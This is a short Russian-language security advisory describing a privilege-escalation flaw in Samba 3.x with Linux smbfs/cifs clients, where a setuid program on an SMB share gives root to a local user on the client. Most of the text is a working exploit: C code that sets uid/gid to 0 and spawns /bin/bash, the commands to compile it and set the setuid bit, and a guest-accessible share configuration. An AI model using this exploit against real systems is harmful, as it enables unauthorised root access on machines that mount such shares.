Уязвимость обнаружена в работе сервера
Samba 3.x и клиента Linux smbfs 2.6.x или 2.4.25-pre8 с UNIX
extensions в .config или 2.4.x + cifs-UE патчи.
Пользователь может получить повышенные
привилегии создавая setuid программу на
клиенте и запуская ее (при помощи SMB share) на
другой. Для работы нужен сервер (предоставляющий
setuid бинарник) и клиент (жертва, монтирующая
ресурс и запускающая программу; атакующий
должен иметь локальный аккаунт).

Эксплоит:

# cat a.c
main()
{
        setuid(0);
        setgid(0);
        system("/bin/bash");
}

# make a
cc a.c -o a
# chmod +s a

#cat /etc/samba/smb.conf

[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share

# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a

Оставить мнение